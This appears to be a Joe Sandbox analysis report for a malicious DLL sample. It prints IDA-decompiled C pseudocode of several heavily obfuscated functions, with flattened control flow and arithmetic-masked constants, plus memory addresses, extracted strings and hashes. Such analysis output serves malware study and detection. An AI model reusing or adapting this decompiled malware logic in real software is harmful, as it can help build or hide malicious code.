0x00d54176
0x00d5417b
0x00d54188
0x00d5418c
0x00d54194
0x00d5419c
0x00d541a4
0x00d541ac
0x00d541b4
0x00d541b9
0x00d541c1
0x00d541c9
0x00d541d1
0x00d541d9
0x00d541e1
0x00d541e6
0x00d541ee
0x00d541ee
0x00d541ee
0x00d541f2
0x00d541f2
0x00d541f2
0x00000000
0x00d541f6
0x00d54208
0x00d542d3
0x00d542df
0x00d542e5
0x00d542f0
0x00d542f7
0x00d542fb
0x00d5430a
0x00d54335
0x00d5433a
0x00d54352
0x00d5435b
0x00d54369
0x00d5436d
0x00d54370
0x00d54373
0x00d5437c
0x00d54388
0x00000000
0x00d5420e
0x00d54214
0x00d542bc
0x00d542c2
0x00d542c7
0x00d542ca
0x00000000
0x00d5421a
0x00d54220
0x00d54299
0x00d5429e
0x00d542a2
0x00d542a5
0x00d542a9
0x00d542ae
0x00d542b2
0x00000000
0x00d54222
0x00d54228
0x00d54272
0x00d54274
0x00d5427c
0x00000000
0x00d5422a
0x00d54230
0x00d543c4
0x00d54236
0x00d5423c
0x00d543a7
0x00d543a7
0x00d543ad
0x00d541f2
0x00d541f2
0x00000000
0x00d541f2
0x00d54242
0x00d54252
0x00d54253
0x00d5425b
0x00d5425d
0x00d54262
0x00d54268
0x00d541ee
0x00d541ee
0x00d541ee
0x00d541f2
0x00d541f2
0x00d541f2
0x00000000
0x00d541f2
0x00d541f2
0x00d541ee
0x00d54262
0x00d5423c
0x00d54230
0x00d54228
0x00d54220
0x00d54214
0x00d543cb
0x00d543d7
0x00d543db
0x00d543e0
0x00d543e5
0x00d543e5
0x00d54391
0x00d54396
0x00d5439b
0x00d5439d
0x00d543a0
0x00d543a4
0x00d543a4
0x00d543a4
0x00000000
0x00d543a4
0x00d541f2

Strings

ldM', xrefs: 00D541E6
q(, xrefs: 00D540E2
z}, xrefs: 00D5422A
y%, xrefs: 00D54129
r', xrefs: 00D5433A

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ldM'$q($r'$y%$z}
API String ID: 0-1771948706
Opcode ID: 643fc3e8aa3932c47640217673b2a2d7c2ce46c4cbddc42e5e99a6087b3a76fc
Instruction ID: f623d27a2d7685272d4192e74a4fe7ddf318076bb27048bc95e452a99c4d85df
Opcode Fuzzy Hash: 643fc3e8aa3932c47640217673b2a2d7c2ce46c4cbddc42e5e99a6087b3a76fc
Instruction Fuzzy Hash: CBD15F721083809FD368CF25C48955BBFF2FB99358F148A0DF6A696260D3B5C949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00D3FB8E, Relevance: 6.5, Strings: 5, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00D3FB8E(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t261;
				intOrPtr* _t284;
				void* _t286;
				intOrPtr _t294;
				intOrPtr* _t295;
				void* _t297;
				intOrPtr* _t299;
				void* _t301;
				void* _t325;
				intOrPtr* _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int* _t337;

				_t299 = _a4;
				_push(_a8);
				_t327 = __edx;
				_push(_t299);
				_push(__edx);
				_push(__ecx);
				E00D4FE29(_t261);
				_v92 = 0x4ad2af;
				_t337 =  &(( &_v124)[4]);
				_v92 = _v92 << 4;
				_t325 = 0;
				_t301 = 0xeae8bd1;
				_t328 = 0x27;
				_v92 = _v92 * 0x30;
				_v92 = _v92 ^ 0xe0780d01;
				_v32 = 0x52ecdf;
				_v32 = _v32 | 0x4795fc12;
				_v32 = _v32 ^ 0x47d7fcde;
				_v40 = 0x6c24d1;
				_v40 = _v40 + 0xffffd677;
				_v40 = _v40 ^ 0x006bfb48;
				_v124 = 0xafb159;
				_v124 = _v124 + 0x853c;
				_v124 = _v124 * 0x3c;
				_v124 = _v124 + 0xffffb483;
				_v124 = _v124 ^ 0x294c7f6f;
				_v116 = 0x2e5989;
				_v116 = _v116 << 3;
				_v116 = _v116 << 0xc;
				_v116 = _v116 + 0xffff32fd;
				_v116 = _v116 ^ 0x2cc3b2fd;
				_v104 = 0xb70fe2;
				_v104 = _v104 * 0x61;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x00000115;
				_v20 = 0x29c7ba;
				_v20 = _v20 / _t328;
				_v20 = _v20 ^ 0x0001123f;
				_v44 = 0xd235de;
				_t329 = 0x19;
				_v44 = _v44 * 0x34;
				_v44 = _v44 ^ 0x2ab83bf3;
				_v120 = 0x2b8a20;
				_v120 = _v120 / _t329;
				_v120 = _v120 + 0xd97b;
				_v120 = _v120 + 0x9745;
				_v120 = _v120 ^ 0x00091694;
				_v80 = 0x44ed89;
				_v80 = _v80 << 8;
				_v80 = _v80 + 0x6d47;
				_v80 = _v80 ^ 0x44e06617;
				_v84 = 0x8c3da4;
				_v84 = _v84 << 3;
				_v84 = _v84 + 0xffff28ee;
				_v84 = _v84 ^ 0x04621daf;
				_v88 = 0x7b0e01;
				_t330 = 0x2a;
				_v88 = _v88 * 0x7e;
				_v88 = _v88 / _t330;
				_v88 = _v88 ^ 0x01771ea0;
				_v48 = 0xf210e7;
				_t331 = 0x56;
				_v48 = _v48 / _t331;
				_v48 = _v48 ^ 0x000151ed;
				_v52 = 0xb85aaa;
				_v52 = _v52 ^ 0x7279f80c;
				_v52 = _v52 ^ 0x72c0fdc9;
				_v108 = 0xe210ad;
				_v108 = _v108 + 0xffffc30f;
				_v108 = _v108 ^ 0xff005d9c;
				_v108 = _v108 ^ 0x468aee4e;
				_v108 = _v108 ^ 0xb96c249f;
				_v36 = 0xf02045;
				_t332 = 0x7e;
				_v36 = _v36 * 0x7d;
				_v36 = _v36 ^ 0x753d6877;
				_v76 = 0x890c0b;
				_v76 = _v76 | 0x3fa19484;
				_v76 = _v76 + 0xc76f;
				_v76 = _v76 ^ 0x3fa932ba;
				_v112 = 0xdcee96;
				_v112 = _v112 << 0xb;
				_v112 = _v112 / _t332;
				_v112 = _v112 ^ 0x6c4d9ccb;
				_v112 = _v112 ^ 0x6d94fd95;
				_v56 = 0x741505;
				_t333 = 0x1d;
				_v56 = _v56 / _t333;
				_v56 = _v56 + 0xe34c;
				_v56 = _v56 ^ 0x00059e64;
				_v24 = 0xde7835;
				_t334 = 0x73;
				_v24 = _v24 * 7;
				_v24 = _v24 ^ 0x0614b333;
				_v28 = 0x817a7e;
				_v28 = _v28 + 0x50ff;
				_v28 = _v28 ^ 0x008db9da;
				_v60 = 0x30460f;
				_v60 = _v60 | 0x5b476089;
				_v60 = _v60 + 0x7857;
				_v60 = _v60 ^ 0x5b7b85ad;
				_v64 = 0x3287c5;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 | 0xf6bf374a;
				_v64 = _v64 ^ 0xf6be02d9;
				_v68 = 0xbf5def;
				_v68 = _v68 + 0xffff47b3;
				_v68 = _v68 + 0xffff0d11;
				_v68 = _v68 ^ 0x00bf58a8;
				_v72 = 0xc5c956;
				_v72 = _v72 ^ 0x0920ed5d;
				_v72 = _v72 / _t334;
				_v72 = _v72 ^ 0x00102287;
				_v16 = 0x6e7810;
				_v16 = _v16 + 0xffff2e79;
				_v16 = _v16 ^ 0x0061adb7;
				_v96 = 0xe3f1bb;
				_v96 = _v96 | 0x17c89f2a;
				_v96 = _v96 ^ 0x2d56d01e;
				_v96 = _v96 ^ 0x01e2669f;
				_v96 = _v96 ^ 0x3b5230bc;
				_v100 = 0x967d31;
				_v100 = _v100 | 0xebdf376e;
				_v100 = _v100 + 0x87ad;
				_v100 = _v100 ^ 0xebeed43d;
				do {
					while(_t301 != 0x242fff5) {
						if(_t301 == 0x95dc10a) {
							_push(_t301);
							_push(_t301);
							_t294 = E00D3C5D8(_v8);
							_t337 =  &(_t337[3]);
							_v12 = _t294;
							if(_t294 != 0) {
								_t301 = 0x242fff5;
								continue;
							}
						} else {
							if(_t301 == 0xb01d963) {
								_t295 =  *0xd56224; // 0x0
								_t297 = E00D32194(_v40, _v44, _t301, _v120, _v80, _v124, _v84, _v88, _t301, _v48,  *_t327, _v52,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v92,  *_t295, _t325);
								_t337 =  &(_t337[0xf]);
								if(_t297 == _v116) {
									_t301 = 0x95dc10a;
									continue;
								}
							} else {
								if(_t301 == 0xb93db5b) {
									E00D52B09(_v16, _v12, _v96, _v100);
								} else {
									if(_t301 != 0xeae8bd1) {
										goto L13;
									} else {
										_t301 = 0xb01d963;
										continue;
									}
								}
							}
						}
						L17:
						return _t325;
					}
					_t284 =  *0xd56224; // 0x0
					_t286 = E00D32194(_v8, _v56, _t301, _v24, _v28, _v104, _v60, _v64, _t301, _v68,  *_t327, _v72,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v32,  *_t284, _v12);
					_t337 =  &(_t337[0xf]);
					if(_t286 == _v20) {
						 *_t299 = _v12;
						_t325 = 1;
						 *((intOrPtr*)(_t299 + 4)) = _v8;
					} else {
						_t301 = 0xb93db5b;
						goto L13;
					}
					goto L17;
					L13:
				} while (_t301 != 0xf5a5c60);
				goto L17;
			}

0x00d3fb92
0x00d3fb9c
0x00d3fba3
0x00d3fba5
0x00d3fba6
0x00d3fba7
0x00d3fba8
0x00d3fbad
0x00d3fbb5
0x00d3fbb8
0x00d3fbc4
0x00d3fbc6
0x00d3fbcd
0x00d3fbd0
0x00d3fbd4
0x00d3fbdc
0x00d3fbe4
0x00d3fbec
0x00d3fbf4
0x00d3fbfc
0x00d3fc04
0x00d3fc0c
0x00d3fc14
0x00d3fc21
0x00d3fc25
0x00d3fc2d
0x00d3fc35
0x00d3fc3d
0x00d3fc42
0x00d3fc47
0x00d3fc4f
0x00d3fc57
0x00d3fc64
0x00d3fc68
0x00d3fc6d
0x00d3fc72
0x00d3fc7a
0x00d3fc8a
0x00d3fc8e
0x00d3fc96
0x00d3fca3
0x00d3fca6
0x00d3fcaa
0x00d3fcb2
0x00d3fcc2
0x00d3fcc6
0x00d3fcce
0x00d3fcd6
0x00d3fcde
0x00d3fce6
0x00d3fceb
0x00d3fcf3
0x00d3fcfb
0x00d3fd03
0x00d3fd08
0x00d3fd10
0x00d3fd18
0x00d3fd25
0x00d3fd26
0x00d3fd30
0x00d3fd34
0x00d3fd3e
0x00d3fd4c
0x00d3fd51
0x00d3fd57
0x00d3fd5f
0x00d3fd67
0x00d3fd6f
0x00d3fd77
0x00d3fd7f
0x00d3fd87
0x00d3fd8f
0x00d3fd97
0x00d3fd9f
0x00d3fdac
0x00d3fdaf
0x00d3fdb3
0x00d3fdbb
0x00d3fdc3
0x00d3fdcb
0x00d3fdd3
0x00d3fddb
0x00d3fde3
0x00d3fdf0
0x00d3fdf4
0x00d3fdfc
0x00d3fe04
0x00d3fe10
0x00d3fe15
0x00d3fe1b
0x00d3fe23
0x00d3fe2b
0x00d3fe38
0x00d3fe39
0x00d3fe3d
0x00d3fe45
0x00d3fe4d
0x00d3fe55
0x00d3fe5d
0x00d3fe65
0x00d3fe6d
0x00d3fe75
0x00d3fe7d
0x00d3fe85
0x00d3fe8a
0x00d3fe92
0x00d3fe9a
0x00d3fea2
0x00d3feaa
0x00d3feb2
0x00d3feba
0x00d3fec2
0x00d3fed0
0x00d3fed4
0x00d3fedc
0x00d3fee4
0x00d3feec
0x00d3fef4
0x00d3fefc
0x00d3ff04
0x00d3ff0c
0x00d3ff14
0x00d3ff1c
0x00d3ff24
0x00d3ff31
0x00d3ff39
0x00d3ff41
0x00d3ff41
0x00d3ff4f
0x00d3ffed
0x00d3ffee
0x00d3fff6
0x00d3fffb
0x00d3fffe
0x00d40007
0x00d4000d
0x00000000
0x00d4000d
0x00d3ff55
0x00d3ff5b
0x00d3ff7c
0x00d3ffc1
0x00d3ffc6
0x00d3ffcd
0x00d3ffd3
0x00000000
0x00d3ffd3
0x00d3ff5d
0x00d3ff63
0x00d4009c
0x00d3ff69
0x00d3ff6f
0x00000000
0x00d3ff75
0x00d3ff75
0x00000000
0x00d3ff75
0x00d3ff6f
0x00d3ff63
0x00d3ff5b
0x00d400bb
0x00d400c4
0x00d400c4
0x00d4001b
0x00d40065
0x00d4006a
0x00d40071
0x00d400ae
0x00d400b0
0x00d400b8
0x00d40073
0x00d40073
0x00000000
0x00d40073
0x00000000
0x00d40078
0x00d40078
0x00000000

Strings

Gm, xrefs: 00D3FCEB
Wx, xrefs: 00D3FE6D
] , xrefs: 00D3FEC2
L, xrefs: 00D3FE1B
wh=u, xrefs: 00D3FDB3

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: Gm$L$Wx$] $wh=u
API String ID: 0-1494249286
Opcode ID: dc6c3330aecbe450c0f2d54dc396fb1e62dda7a123133a99ac1f8e8ea5054fdb
Instruction ID: 5b0e3e43ccb52ab41e39444d80ef80867bbbdc7633a53ea581ee05507b17efa6
Opcode Fuzzy Hash: dc6c3330aecbe450c0f2d54dc396fb1e62dda7a123133a99ac1f8e8ea5054fdb
Instruction Fuzzy Hash: C1D11E724093809FC768CF66C889A1BFBF1FB89748F10891DF69586260D7B28949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D48D3D, Relevance: 6.4, Strings: 5, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00D48D3D() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr* _t155;
				signed int _t170;
				void* _t172;
				signed int* _t174;

				_t174 =  &_v60;
				_v4 = _v4 & 0x00000000;
				_v16 = 0xb96ea3;
				_v12 = 0x2b597c;
				_v8 = 0x15d14c;
				_v24 = 0xfb9f01;
				_v24 = _v24 + 0xffffc2ea;
				_v24 = _v24 ^ 0x00f09b24;
				_v28 = 0x44d8ac;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0118b46b;
				_v56 = 0xb4bcfb;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 + 0x1918;
				_t151 = 0x33;
				_v56 = _v56 / _t151;
				_t172 = 0x18a299a;
				_v56 = _v56 ^ 0x00075f97;
				_v60 = 0x54631c;
				_t152 = 0x32;
				_v60 = _v60 / _t152;
				_v60 = _v60 + 0xe0cb;
				_v60 = _v60 + 0x7b8a;
				_v60 = _v60 ^ 0x000a1fda;
				_v32 = 0x2b0ed;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 | 0x09ea9e28;
				_v32 = _v32 ^ 0x09ed7baa;
				_v48 = 0x16a7f0;
				_v48 = _v48 << 6;
				_t170 = 0x54;
				_v48 = _v48 / _t170;
				_t153 = 0x50;
				_v48 = _v48 / _t153;
				_v48 = _v48 ^ 0x000d9328;
				_v52 = 0x3f1fdb;
				_v52 = _v52 | 0x0053e637;
				_v52 = _v52 ^ 0xce168c33;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0ce6f5f4;
				_v36 = 0x33e495;
				_v36 = _v36 + 0xc7cc;
				_v36 = _v36 / _t170;
				_v36 = _v36 + 0x230d;
				_v36 = _v36 ^ 0x000308d4;
				_v40 = 0xaa804b;
				_t139 = _v40;
				_t154 = 0x42;
				_t169 = _t139 % _t154;
				_v40 = _t139 / _t154;
				_v40 = _v40 + 0xffff246c;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x000d5f20;
				_v44 = 0x5ad1c5;
				_v44 = _v44 + 0x4d5e;
				_v44 = _v44 + 0xffff9f53;
				_v44 = _v44 + 0xffff11b0;
				_v44 = _v44 ^ 0x005bbdbb;
				_v20 = 0x89125f;
				_v20 = _v20 ^ 0x0bb83411;
				_v20 = _v20 ^ 0x0b3ba340;
				_t155 =  *0xd56208; // 0x0
				do {
					while(_t172 != 0x550abf) {
						if(_t172 == 0x18a299a) {
							_push(_t155);
							_push(_t155);
							_t155 = E00D3C5D8(0x2c);
							_t174 =  &(_t174[3]);
							 *0xd56208 = _t155;
							_t172 = 0x550abf;
							continue;
						} else {
							if(_t172 != 0x6125a42) {
								goto L8;
							} else {
								_t147 = E00D40EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E00D536AA);
								_t155 =  *0xd56208; // 0x0
								 *_t155 = _t147;
							}
						}
						L5:
						return 0 | _t155 != 0x00000000;
					}
					_t169 = _v48;
					_t141 = E00D348DD(_v32, _v48, _v52);
					_t155 =  *0xd56208; // 0x0
					_t174 = _t174 - 0x10 + 0x14;
					_t172 = 0x6125a42;
					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
					L8:
				} while (_t172 != 0x92686f5);
				goto L5;
			}

0x00d48d3d
0x00d48d40
0x00d48d47
0x00d48d4f
0x00d48d57
0x00d48d5f
0x00d48d67
0x00d48d6f
0x00d48d77
0x00d48d7f
0x00d48d84
0x00d48d8c
0x00d48d94
0x00d48d99
0x00d48dab
0x00d48db5
0x00d48db9
0x00d48dbb
0x00d48dc3
0x00d48dd1
0x00d48dd6
0x00d48dda
0x00d48de2
0x00d48dea
0x00d48df2
0x00d48dfa
0x00d48dff
0x00d48e07
0x00d48e0f
0x00d48e17
0x00d48e22
0x00d48e27
0x00d48e31
0x00d48e36
0x00d48e3a
0x00d48e42
0x00d48e4a
0x00d48e52
0x00d48e5a
0x00d48e5f
0x00d48e67
0x00d48e6f
0x00d48e7f
0x00d48e85
0x00d48e8d
0x00d48e95
0x00d48e9d
0x00d48ea1
0x00d48ea2
0x00d48ea4
0x00d48ea8
0x00d48eb0
0x00d48eb5
0x00d48ebd
0x00d48ec5
0x00d48ecd
0x00d48ed5
0x00d48ee2
0x00d48eef
0x00d48ef7
0x00d48eff
0x00d48f07
0x00d48f0d
0x00d48f0d
0x00d48f13
0x00d48f66
0x00d48f67
0x00d48f6f
0x00d48f71
0x00d48f74
0x00d48f7a
0x00000000
0x00d48f15
0x00d48f17
0x00000000
0x00d48f1d
0x00d48f37
0x00d48f3c
0x00d48f45
0x00d48f45
0x00d48f17
0x00d48f48
0x00d48f55
0x00d48f55
0x00d48f85
0x00d48f8d
0x00d48f92
0x00d48f98
0x00d48f9b
0x00d48f9d
0x00d48fa0
0x00d48fa0
0x00000000

Strings

7S, xrefs: 00D48E4A
^M, xrefs: 00D48EC5
_, xrefs: 00D48EB5
#, xrefs: 00D48E85
|Y+, xrefs: 00D48D4F

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$ _$7S$^M$|Y+
API String ID: 0-3744723356
Opcode ID: 60d3ced8a935fb358d9d71b784e0c3f390821ebb91a14987aaeb4412828ea319
Instruction ID: 500eb1f1a43bb5e5af3a02679c2bcc6544f1df76a371d83a255924fb3faeb9f9
Opcode Fuzzy Hash: 60d3ced8a935fb358d9d71b784e0c3f390821ebb91a14987aaeb4412828ea319
Instruction Fuzzy Hash: FF5166715083419FD348DF25D88A50FBBE1FBC8768F008A1DF499A6260D7B5CA49CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00D4437A, Relevance: 5.4, Strings: 4, Instructions: 412COMMON

Download Yara Rule

Strings

3;+, xrefs: 00D444EA
7S, xrefs: 00D4469F
#`, xrefs: 00D4453F
#[y,, xrefs: 00D445D3

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #`$#[y,$3;+$7S
API String ID: 0-3740457175
Opcode ID: 2b0495cf6ad046ec4190cb4bc1b81ba1af15c6ab7303cbc9481101b447883234
Instruction ID: b617409679c119caf8289dfc483ac45ccc12bf952d87f8f047d87d85233d35fa
Opcode Fuzzy Hash: 2b0495cf6ad046ec4190cb4bc1b81ba1af15c6ab7303cbc9481101b447883234
Instruction Fuzzy Hash: CF123671D00218DBDF28CFA5D98AADEBBB2FF44314F248159E119BB260D7B14A96CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D500EF, Relevance: 5.3, Strings: 4, Instructions: 274COMMON

Download Yara Rule

Strings

_!1, xrefs: 00D5026E
$P, xrefs: 00D50101
+XJ, xrefs: 00D50250
XW, xrefs: 00D50475

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$+XJ$XW$_!1
API String ID: 0-3524045022
Opcode ID: 2c91cb3be944221ce65cc4a51123d8f6c30f762d2be48bffa194b3a4b21784e5
Instruction ID: 539a7c1b41827ec5bf16254cb289c7ccfe8851458df5b83648dfcfd43310d276
Opcode Fuzzy Hash: 2c91cb3be944221ce65cc4a51123d8f6c30f762d2be48bffa194b3a4b21784e5
Instruction Fuzzy Hash: 0BD101715093809FD768CF21C94AA5BFBF2FBC4748F108A1DF59996260D7B19908CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D380C0, Relevance: 5.3, Strings: 4, Instructions: 261COMMON

Download Yara Rule

Strings

{lN, xrefs: 00D38304
K:, xrefs: 00D38134
#', xrefs: 00D38192
"M|X, xrefs: 00D3828D

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "M|X$#'$K:${lN
API String ID: 0-1886388755
Opcode ID: 921e4d370c150c4c2889a0eafa9da968b927048d7ba6a385208996825466b648
Instruction ID: 7e85ebdb52e2010d77ed7a9ab6e06e27d2c9f07d62ac4a773fe79ea07e59eb00
Opcode Fuzzy Hash: 921e4d370c150c4c2889a0eafa9da968b927048d7ba6a385208996825466b648
Instruction Fuzzy Hash: 64C141725083809FC358CF2AC48A90BFBE1FBD4758F10892DF99596260D7B5D949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00D34BFC, Relevance: 5.2, Strings: 4, Instructions: 245COMMON

Download Yara Rule

Strings

~<?, xrefs: 00D34C8E
8&, xrefs: 00D34E58
Rw, xrefs: 00D34C0B
~<?, xrefs: 00D34CAA

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 8&$Rw$~<?$~<?
API String ID: 0-2119221410
Opcode ID: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction ID: befdd390dd5b245edd83ebb097b9048f5c8564cd79cdf40790864291656e6e3c
Opcode Fuzzy Hash: 8600c1e993c0d45627bb2cec288f3db7b3b12e0d783027c3838aca3f29b87caf
Instruction Fuzzy Hash: DDB13E716093419FC358CF2AC48991BFBE1BBC4758F54892DF8A597220D3B8D949CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00D52D53, Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

$P, xrefs: 00D52DC3, 00D530B9
+;, xrefs: 00D52F83
sH, xrefs: 00D52F41
zbv, xrefs: 00D52E19

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$sH$zbv$+;
API String ID: 0-3806253346
Opcode ID: a8c5ae6c115d536fba8969ed3c8ccb06eaefa241d229f759b715490dd8f1ce9c
Instruction ID: 40988adff9518e271cd9466fbd65f4b85d38eb075326e9afe237e6d11c6a773f
Opcode Fuzzy Hash: a8c5ae6c115d536fba8969ed3c8ccb06eaefa241d229f759b715490dd8f1ce9c
Instruction Fuzzy Hash: 13B10F72408381AFD758CF65C48A81BFBE1BBC4358F509A1DF99686260D3B1CA49CF93

Uniqueness

Uniqueness Score: -1.00%

Function 00D4E4E5, Relevance: 5.2, Strings: 4, Instructions: 220COMMON

Download Yara Rule

Strings

$P, xrefs: 00D4E623
-, xrefs: 00D4E5D4
ma+, xrefs: 00D4E57D
ap@', xrefs: 00D4E5A3

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$ap@'$-$ma+
API String ID: 0-1845766705
Opcode ID: 1f6a788eb6250741679efa4dae341608ef638c084ceea656ead5af70767d57e0
Instruction ID: 21770013e940b0a3ee5bd0b1b03feac9d74d9e3e447f7329c121bb862671bf15
Opcode Fuzzy Hash: 1f6a788eb6250741679efa4dae341608ef638c084ceea656ead5af70767d57e0
Instruction Fuzzy Hash: 2D918A716083419BC628CF24D89992FBBE1FBD4318F144E2EF69656260C770DA49CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00D43EAA, Relevance: 5.2, Strings: 4, Instructions: 152COMMON

Download Yara Rule

Strings

Zr, xrefs: 00D4412E
p3, xrefs: 00D43F32
4r~, xrefs: 00D43FCF
n<, xrefs: 00D43F14

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4r~$Zr$n<$p3
API String ID: 0-1989199487
Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction ID: 067f925e795cc8e436b371fe9b8508c69d4db33504abd2c883dd7b09806d8cdf
Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction Fuzzy Hash: 716155715083409FC358CE26C48952FBBE1FBD8758F144A2DF29AA6260D3B4CA89CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00D485FF, Relevance: 5.1, Strings: 4, Instructions: 142COMMON

Download Yara Rule

Strings

v@, xrefs: 00D48758
[, xrefs: 00D4871C
R[+, xrefs: 00D4863A
Y, xrefs: 00D48715

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

